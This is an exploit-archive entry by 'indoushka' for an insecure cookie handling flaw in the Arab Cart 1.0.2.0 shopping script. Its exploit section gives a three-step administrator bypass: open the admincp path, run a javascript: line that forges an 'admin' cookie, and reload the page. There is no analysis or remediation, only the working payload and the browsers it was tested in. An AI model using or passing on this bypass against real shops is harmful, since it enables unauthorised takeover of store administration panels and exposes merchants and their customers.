id: 10911
date: 02/15/2010
title: Arab Cart Version 1.0.2.0 Insecure Cookie Handling Vulnerability
author: indoushka
cves: 

================================================================
Arab Cart Version 1.0.2.0 Insecure Cookie Handling Vulnerability
================================================================

========================================================================================                 
| # Title    : Arab Cart Version 1.0.2.0 Insecure Cookie Handling Vulnerability           
| # Author   : indoushka                               
| # Web Site : http://sourceforge.net/projects/arab-cart/                                                                                                                                  
| # Script   : Copyright ArabCART © .2010    
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : Insecure Cookie Handling Vulnerability   
|                                                                 
======================      Exploit By indoushka       =================================
 # Exploit  :
  
 1- http://127.0.0.1/arabCart/admincp/
  
 2- javascript:document.cookie="admin=upass;path=/";
  
 3- Refrash your pag and go back
  
 tested in IE 6 + Opera 10.10 



#  0day.today [2023-03-23]  #